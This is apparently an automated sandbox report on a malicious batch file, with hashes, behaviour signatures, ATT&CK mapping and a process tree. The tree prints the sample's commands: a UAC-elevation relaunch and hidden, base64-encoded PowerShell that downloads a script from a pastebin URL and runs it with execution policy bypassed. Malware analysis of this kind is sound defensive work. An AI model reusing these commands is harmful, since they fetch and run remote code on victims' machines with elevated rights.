847d7d889d1d5dc33f7c24d82dccc71cb9032fd743e8a52364dc5e0a07a03e69

General

Target

virus_src.bat
Size

720B
MD5

25cc17794b4a00de0db1dc2f14580af4
SHA1

f119d7d9bc38af460a8da42c9dbc09faa77130b1
SHA256

847d7d889d1d5dc33f7c24d82dccc71cb9032fd743e8a52364dc5e0a07a03e69
SHA512

70b49b9b7f7798f3ae15dfe100bf19eaf734de4c92b18b75295b06e455d64aee16879432ccfb3d95c78cbe301600504cfe485ddde59745dae62d64dd014b83ab

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2372	powershell.exe
2920	powershell.exe
2676	powershell.exe
2680	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2920	powershell.exe
2676	powershell.exe
2680	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3044 wrote to memory of 2372	3044	cmd.exe	31
PID 3044 wrote to memory of 2372	3044	cmd.exe	31
PID 3044 wrote to memory of 2372	3044	cmd.exe	31
PID 2372 wrote to memory of 2392	2372	powershell.exe	32
PID 2372 wrote to memory of 2392	2372	powershell.exe	32
PID 2372 wrote to memory of 2392	2372	powershell.exe	32
PID 2392 wrote to memory of 2920	2392	cmd.exe	34
PID 2392 wrote to memory of 2920	2392	cmd.exe	34
PID 2392 wrote to memory of 2920	2392	cmd.exe	34
PID 2392 wrote to memory of 2676	2392	cmd.exe	35
PID 2392 wrote to memory of 2676	2392	cmd.exe	35
PID 2392 wrote to memory of 2676	2392	cmd.exe	35
PID 2676 wrote to memory of 2680	2676	powershell.exe	36
PID 2676 wrote to memory of 2680	2676	powershell.exe	36
PID 2676 wrote to memory of 2680	2676	powershell.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\virus_src.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\virus_src.bat' -ArgumentList "am_admin"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\virus_src.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e72f7db1dbfcee4edca16898125dc3ad

SHA1
8438e9889640f0351b5daf37016216b7d094cfad

SHA256
018a76bf4a8db2137068bd0e17d441439ff45544c94a509ed7b8b3fbe8071c80

SHA512
3003231fb914c27d1b348df192d1511213f4823beaa20304344cc65f98fc9732654ddae408f2db0a1a650190ad75717120abbad1b6abba9ccca67216f830919d

Download Submit
memory/2372-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2372-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2372-8-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2372-9-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2372-4-0x000007FEF5E6E000-0x000007FEF5E6F000-memory.dmp

Filesize
4KB

Download
memory/2372-11-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2372-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2372-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2372-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2676-23-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2676-24-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing